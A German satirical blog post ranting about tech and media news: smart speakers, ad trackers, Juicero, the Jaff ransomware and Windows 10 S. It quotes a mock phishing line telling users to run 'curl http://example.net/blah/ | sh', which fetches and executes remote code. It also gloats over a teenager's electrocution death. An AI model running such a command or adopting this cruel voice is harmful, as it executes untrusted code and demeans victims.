Gefällt mir!

In der ersten Folge der 21. Staffel von South Park werden smarte Lautsprecher wie Echo, Echo Dot oder Google Home mit allerlei ungewöhnlichen Kommandos malträtiert. Aus den USA berichten etliche Zuschauer, dass ihre Echo- und Google-Home-Lautsprecher auf die in der Serie gesprochenen Kommandos reagiert hätten

Bwahahahaha!

Achtet mal drauf, wie der vollhonk von scheißjornalist bei golem selbst in diesem kontext, in dem völlig klar ist, dass es sich um mikrofone handelt, immer noch das reklamelügenwort „lautsprecher“ schreibt, also das genaue gegenteil dessen, was so eine wahnzimmerwanze in wirklich- und wirksamkeit ist.

Bwahahahaha!

Diese scheißjornalisten, die selbst dann noch die reklame-hirnficks wiederkäuen, wenn sie sie gerade eben in ihrem eigenen text selbst widerlegt haben, wollen allen ernstes, dass jemand für ihr schmieriges tintengeklexe geld zahlt!

Bwahahahaha!

Stellt euch mal schöne „lautsprecher“ in die bude! Ihr schafft es demnächst auch noch, euer getreide mit isotonischen getränken zu gießen, ihr infantilisierten hirnverneiner an der verdummungsfront! Und Erich Mielke wäre so stolz auf euch gewesen!

Advertisements

Und nun zu den polizeimeldungen…

Mit einem außergewöhnlichen Anliegen meldete sich am Samstag, den 09.09.2017 eine 44-jährige Frau über Notruf nachmittags bei der Polizeiinspektion Bad Kreuznach. Die Anruferin wollte eine Anzeige gegen einen Drogen-Kurier machen, da er ihr nicht die gewünschten Drogen lieferte

Was die wohl für ein kraut geraucht hat… ich glaube ja, dass eine freigabe von cannabis zu genuss- und politikertragungszwecken die umgestaltung des landes in eine idiocracy sehr beflügeln würde.

Krokodilskullertränchen des tages

Hier flennt anlässlich eines treffens professjoneller lügner (schönsprecherisch als „werber“ bezeichnet) ein vertreter der contentindustrie über die kontrollverluste (speitüte bereithalten!):

So enthielten 30 Prozent der Werbemittel mehr als fünf Traffic-Pixel, mit denen Werbetreibende und Technikdienstleister Ausspielung und viele weitere Daten zu erfassen versuchen. Spitzenreiter beim Hamburger Verlag war ein Werbebanner, der zusammen mit 86 Tracking-Pixeln ausgeliefert wurde.

Diese Praxis schlage nicht nur auf das Datenvolumen der Endnutzer, sie sorgten auch dafür, dass Verlage kaum noch Kontrolle über die eigenen Daten hätten: „Wir kennen ein Viertel der Firmen nicht, die dort drin sind“. Diese Auswüchse seien auch das Ergebnis langer Vertriebsketten. So starteten Werbemittel oft richtliniengemäß, bekämen bei jedem Bearbeitungsschritt jedoch durch einen anderen Dienstleister weitere Daten und Skripte hinzugefügt

Hej, du mutmaßlich nicht so hirnbegabter vermarktungssportler, du sprichst also als vertreter eines berufsstandes, der seine eigenen webseits freiwillig mit solchen überreich dargebotenen leservertreibungsmetoden unbenutzbar macht und hast dabei allen ernstes die stirn, darüber zu klagen, dass dir die übersicht verloren gegangen ist?! Komm, geh gepflegt wirtschaftlich verrecken, du speerspitze der unaufhaltsamen idiocracy! Den ast, auf dem du sitzt, sägst du schon seit anderthalb jahrzehnten selbst an. Wer von seinen lesern lebt, sollte sie besser nicht verachten…

Tschüss

Obwohl die idiocracy vor allem in den USA unaufhaltsam und mit mechanischer schnelligkeit voranschreitet, konnte man den leuten wohl doch nicht so oft eine völlig überflüssige und überteuerte saftpresse für überteuerte saftpakete, die man auch von hand auspressen könnte, andrehen.

Opulent ausgestattet mit fast 130 Millionen Dollar Investmentkapital wollte das US-Startup Juicero mit einer ans Internet angeschlossenen Saftpresse an den großen Erfolg etwa des Thermomix von Vorwerk anknüpfen – allein, es hat nicht sollen sein

Übrigens: was heise onlein unten in diesem artikel „organische säfte“ nennt, waren im englischen höchstwahrscheinlich „organic juices“ und damit auf deutsch sinngemäß „biosäfte“ oder „natursäfte“. Ist schon schwierig mit der sprache, ich weiß, ich falle ja auch immer wieder mal rein. Aber ein schauderhaft wortgetüm wie „organische säfte“ muss doch beim lesen irgendwie auffallen, wenn da ein paar reste von sprachgefühl sind. Ach, es ist jornalismus…

Wer verstehen möchte, warum dieser unnötige tinnef 400 dollar gekostet hat (anfangs sogar 700 dollar), keinen saft und keine anderen flüssigkeiten im mund hat und gut englisch lesen kann, kann ja mal hier einen sehr langen text über den aufbau dieser presse weiterlesen… und sich dabei ständig bewusst machen, dass es „nur“ darum geht, druck auf eine verpackung auszuüben.

Immerhin hat es massenhaft idjoten gegeben, die diesen scheiß gekauft haben. Nicht daten sind der rohstoff der zukunft, dummheit ists.

Ich gratuliere guhgell… ähm… alphabet zu seiner gelungenen investizjon in diesen saftladen! Endlich wieder was zum abschreiben nach den ganzen erfolgen!

S/M des tages

Kleine rätselfrage zum nachdenken: was wird wohl mittel- und langfristig im wexelspiel mit der menschlichen psyche passieren, wenn man auf S/M-webseits¹ — die ja schon über das technische und unpersönliche medium internetz laufen — dafür sorgt, dass die „kommunikazjon“ immer mehr entsprachlicht wird, so dass es nicht zu einem austausch von worten, argumenten, ideen (und beleidigungen) kommt, und wenn stattdessen immer mehr mit fotos, videos und bildern ausgedrückt werden soll?

Hier ein kleiner teil der antwort:

Eine Studie der gemeinnützigen Organisation „Ditch the Label“ kommt zum Schluss, dass Instagram unter Jugendlichen das bevorzugte Medium für Mobbing ist […] Als häufigstes Ziel für Hasskommentare wurde das Aussehen ermittelt

Prof. dr. Offensichtlich hätte beim lesen dieser worte beinahe einen herzinfarkt vor überraschung bekommen…

¹S/M ist meine abk. für „social media“. Aus gründen.

Idiotie des tages

Ist nicht wirklich von heute, aber mich hat da erst heute jemand mit dem näschen reingestupst, und es ist auch immer noch idjotisch: Absurde und gnadenlos dumme plastikverpackungen… die idiocracy in ihrem lauf hält weder ox noch esel auf. (Leider sind ein paar beispiele über das zwitscherchen eingebettet. Aber das, was man ohne javascript sehen kann, reicht schon hin, um das aussterben der menschheit für einen schritt in die richtige richtung zu halten.)

Mit darwinistischer freude…

Mit darwinistischer freude freue ich mich jedes mal, wenn dummheit endlich mal wieder irgendwo ein kleiner evoluzjonsnachteil geworden ist:

Baden mit Smartphone: 14-Jährige stirbt durch Stromschlag

Bitte, liebe kiddies, macht einen großen trend aus badewannen- und dusch-selfies! Am besten so, dass ihr euch zusätzlich zeitsparend in badewanne oder dusche fönt! Und danach einen zweiten trend mit selfies bei begräbnissen eurer S/M-freunde¹, damit ich auch etwas zum freuen habe.

Könnt ja die däumchen bei diesen ganzen trends bekwem in der badewanne klicken!

Die Familie warnt nun in den sozialen Netzwerken: Viele junge Menschen wüssten gar nicht, wie gefährlich Wasser und Elektrizität sind

Tja, dann sterben sie halt.

Ich wusste das jedenfalls noch, als ich ein nur etwas größerer zwerg war, denn es wurde mir immer wieder gesagt. Und verdammte scheiße: vor fuffzich jahren war alles viel gefährlicher als heute, denn überall lagen und standen dinge rum, die giftig, gefährlich oder sehr ungesund waren. Gut, es ist auch eine menge passiert, zugegeben, aber dabei wurde beinahe immer nur dummheit geschädigt — manche dummköpfe lernten daraus, manche dummköpfe starben an ihrer dummheit. Heute wird die dummheit von schule, eltern, reklame und p’litik gefordert und gefördert. Was am ende dieses prozesses rauskommt, werde ich zum glück nicht mehr erleben.

¹S/M ist meine abk. für „social media“. Aus gründen.

Content…

Ich habe für SAT.1 das Wort zum Sonntag gemacht. Ich habe immer gesagt, das ist voralttestamentliche Theologie, was ich da treibe. Man versucht den Leuten, was zu sagen, was sie noch so irgendwie verstehen und damit bleibt man immer auf diesen Niveau und das ist genauso, als wenn eine Mutter mit ihrem Kind immer in der Babysprache brabbeln würde, weil das Kind noch nicht verstehen kann

Warnung für allergiker: hoher religjöser schwafelanteil.

Datenschutz von gesundheitsdaten des tages

Reklame einer Apotheke in einer Tageszeitung. 97% Lieferfähigkeitszugage für Stammkunden mit Rezept. Fehlende Arzneimittel werden per Bote zugestellt. JETZT NEU! Rezepte fotografieren und über WhatsApp vorbestellen...

„Rezepte fotografieren und über whatsäpp vorbestellen“ — hej leute, die ihr so eine datenschutzverachtende drexkacke von hirnlosen scheißapotekern hinnehmt und flugs eure rezepte mit dem wischofon knipst: Erich Mielke wäre ja so stolz auf euch gewesen!

Wenns internetz im händi ist, ists gehirn im arsch. Ich wünsche der generazjon fratzenbuch viel spaß dabei, auch noch die verschreibungen ihres arztes beim fratzenbuch abzuliefern — und dem apoteker, der dieses angebot allen erstes macht, wünsche ich, dass er ganz schnell den insolvenzverwalter kennenlerne! Bevor noch größerer schaden entsteht!

Sicherheitsproblem des tages

Wer auf die Mail hereinfällt und das PDF öffnet, fängt sich Jaff aber noch nicht ein. Erst muss man in der PDF-Anwendung eine Sicherheitswarnung mit einem Klick auf „OK“ abnicken. Anschließend wird ein Word-Dokument mit Makros aus dem PDF extrahiert und geöffnet. Nun muss ein Opfer noch die Makros aktivieren. Erst dann findet die Infektion mit Jaff statt

Sorry, aber wer das macht, kann auf mein mitleid nicht mehr rechnen. Nach so viel mühe hat man sich den erpressungstrojaner aber auf anständige weise selbst verdient. Bei so viel konzentriertem informazjonstechnischen analfabetismus an den tasten hilft auch das sicherste betrübssystem nicht weiter. Wenn man derartige vollpfosten etwa vor einem un*xoiden system setzt und die kriegen da eine spämm mit dem text: „unser voll sicheres sicherheitsverfahren zur erhöhung der sicherheit erfordert eine aktivierung an ihrer kommandozeile, damit sie die angehängten dokumente lesen können, bitte geben sie die anweisung curl http://example.net/blah/ | sh in einer konsole ein! Vielen dank für ihr verständnis!“ — die machen das! Und die kommen sich dabei noch wichtig und kompedingsda vor, weil sie eine tolle, sichere sicherheitszeile von hand abtippen können. (Das mit der zwischenablage werden sie wohl nicht verstehen, und dass man unter X seit rd. 25 jahren einfach mit der mittleren maustaste den woanders markierten text einfügen könnte, wissen sie auch nicht und werden sie auch nie lernen, denn sie brauchen es ja nicht zu wissen.) Die größte sicherheitslücke ist immer noch der digitale analfabet vor dem kompjuter, und dieser analfabet wird mit hohem aufwand systematisch hergestellt, weil man verdummten menschen, die angst vor eigenem wissen und können haben, einfach viel mehr zeugs verkaufen kann. Wischofone zum beispiel. Oder antivirus-schlangenöle. Oder lichtschalter mit internetz. Ach!

Nicht daten sind der rohstoff der zukunft. Dummheit ist der rohstoff der zukunft.

Ach, apropo dummheit: Warum — und vor allem wozu — im namen von drei schwefelkackenden höllenhunden kann man an ein PDF-dokument ein wörd-dokument anhängen? Was ist der intendierte anwendungsfall für dieses funkzjonsmerkmal? Und wie oft wird dieses funkzjonsmerkmal von anwendern genutzt? Wer sinnlos aufgeplusterte softwäjhr von klischen wie „adobe“ (engl. für: gebrannter lehmziegel) benutzt, setzt sich damit auch ziemlich überflüssigen risiken aus.

Idiocracy des tages

Menschen wollen alles in ihrem Leben digital vernetzen: Sie wollen ihr Zuhause automatisieren, Virtual Reality erleben und Smart Digital Assistants verwenden – und all das passiert genau jetzt

Wenns internetz im händi ist, ists gehirn im arsch. Es gibt nur noch eine sehr kleine hoffnung, dass sich das problem der mechanischen infantilisierung und verdummung auf darwinsche weise durch massenhaft totgefahrene senkkopfzombies im straßenverkehr lösen könnte…

Passt!

Wissenschaftler haben festgestellt, dass hirnschäden beim menschen mit höherer religjosität korrelieren. [Link geht auf einen englischen text]

In diesem sinne: Man kann so ein gehirn nicht nur mit einem hammer kaputtmachen, sondern auch mit langsamer verödung durch monatelange nichtbenutzung. Gruß auch an die diesjährige re:pupsichda und an die dort versammelte digitale speerspitze der BRD. Viel spaß noch mit dem zensierten internetz in der idiocracy! :mrgreen:

via Burkhard Schröder

Meikrosoft windohs des tages

Windows 10 S ähnelt im Ansatz dem gescheiterten Windows RT. Auf der neuen Windows-Version laufen nur Apps aus dem Microsoft Store. Darüber hinaus können Nutzer den Standardbrowser nicht ohne weiteres ändern, Microsofts Edge-Browser ist demnach vorgegeben […] Auch die Suchmaschine ist vorgegeben: Microsofts Bing. In Windows 10 S ist keine Funktion vorgesehen, etwa Google als Standardsuchmaschine zu bestimmen

Ich wünsche auch weiterhin viel spaß beim gegängelt- und enteignetwerden. Ihr habt selbst damit angefangen, aktiv geld für kompjuter auszugeben, auf denen euch die freiheit genommen wurde, die softwäjhr laufen zu lassen, die ihr auf dem kompjuter laufen lassen wolltet, und jetzt kriegt ihr den salat. Nee, ihr da hinten auf den weg in die idiocracy, was ihr da erlebt, das ist nicht das ende, das ist erst der anfang. Noch fünf jahre, die ihr euch wie eine horde vollidjoten alles andrehen lasst, und dann sieht auch das „normale“ windohs so aus! Und ihr nehmt es, fresst scheiße und sagt „es gibt doch nix anderes“. Dummheit ist nun einmal der rohstoff der zukunft.

Cargokult des tages

Wer das wort „cargokult“ noch nie gehört hat: die wicked pedia hilft.

Beim US-senat gibt es jetzt einen cargokult, der ein sicheres digitales zugangssystem zum parlamentsgebäude sein soll. Es kann sich eigentlich nur noch um wenige monate handeln, bis die bewohner der USA ihre felder mit isotonischen getränken gießen, weil da elektrolyte drin sind. :mrgreen: